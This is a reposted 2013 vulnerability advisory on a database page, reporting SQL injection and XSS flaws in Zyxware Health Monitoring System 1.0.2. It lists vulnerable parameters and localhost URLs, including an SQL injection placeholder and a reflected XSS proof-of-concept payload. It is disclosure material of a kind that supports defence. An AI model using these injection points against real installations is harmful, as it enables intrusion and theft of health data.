Vulners
Lucene search
Zyxware Health Monitoring System - Multiple Vulnerabilities
###################################################################################################################
______ __ ______
/ \ / | / \
/000000 | ______ ______ ______ 00 |____ _____ ____ ______ /000000 | ______ _______
00 \__00/ / \ / \ / \ 00 \ / \/ \ / \ 00 \__00/ / \ / |
00 \ 000000 |/000000 |000000 |0000000 |000000 0000 | 000000 | 00 \ /000000 |/0000000/
000000 | / 00 |00 | 00/ / 00 |00 | 00 |00 | 00 | 00 | / 00 | 000000 |00 00 |00 |
/ \__00 |/0000000 |00 | /0000000 |00 | 00 |00 | 00 | 00 |/0000000 | / \__00 |00000000/ 00 \_____
00 00/ 00 00 |00 | 00 00 |00 | 00 |00 | 00 | 00 |00 00 | 00 00/ 00 |00 |
000000/ 0000000/ 00/ 0000000/ 00/ 00/ 00/ 00/ 00/ 0000000/ 000000/ 0000000/ 0000000/
###################################################################################################################
Product: Zyxware Health Monitoring System
Product Version: 1.0.2
Vendor: Zyxware Technologies
Vendor Notification: Sept 3, 2013
Public Disclosure: Sept 9, 2013
Vulnerability Type: Sql Injection, XSS
Risk Level: High
Discovered and Provided By:
Sarahma Security
Sarahma Global Informatika
Website : wwww.sarahma.co.id
Email : [email protected]
###################################################################################################################
========================
SQL Injection
========================
Found on
http://localhost/healthmonitor/maps/diseaseinfo.php
Parameter : strDiseaseName
http://localhost/healthmonitor/maps/diseaseinfo.php?strDiseaseName=1'{SQL_HERE}
Found On
http://localhost/healthmonitor/maps/summary.php
Parameter : opt
http://localhost/healthmonitor/maps/summary.php?opt=1'{SQL_HERE}&type=Dist
========================
XSS Vulnerability
========================
Found On :
http://localhost/healthmonitor/maps/diseaseinfo.php
parameter : rightContent
http://localhost/healthmonitor/maps/googlemap.php
parameter : mapheight and mapwidth
http://localhost/healthmonitor/maps/khmheading.php
parameter : imageheight
http://localhost/healthmonitor/maps/moreinfo.php
parameter : rightContent
http://localhost/healthmonitor/maps/summary.php
parameter : opt and rightContent
Example :
http://localhost/healthmonitor/maps/khmheading.php?imageheight=0&imagePadding=%22%3Cscript%3E%20alert%28%27XSS%27%29%3C/script%3E
========================
Solution :
========================
No Update Until This Advisory published
========================
Timeline:
========================
2013-09-03 Provided details to vendor
2013-09-08 No Response From vendor
2013-09-09 Advisory published
# 0day.today [2018-04-12] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Oct 2013 00:00Current
7.1High risk
Vulners AI Score7.1